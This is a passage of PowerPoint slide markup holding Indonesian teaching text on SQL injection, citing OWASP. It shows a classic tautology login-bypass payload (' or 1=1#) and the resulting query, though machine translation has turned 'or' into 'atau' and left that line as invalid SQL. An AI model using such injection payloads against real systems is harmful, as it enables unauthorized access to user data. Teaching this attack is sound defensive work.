              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membacanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Structured Query Language (SQL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data (SELECT), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyisipkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data (INSERT), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data (DELETE), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data (UPDATE). Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>empat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> set SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kueri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> parameter. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekstrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyisipkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arbitrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data (owasp.org/www-community/ attacks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>SQL_Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>formulir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "Bob", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kueri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tbl_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>nama_pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> = 'Bob'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> string ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1=1# dan input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disterilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kueri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tbl_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> WHERE username = '' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 1=1#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
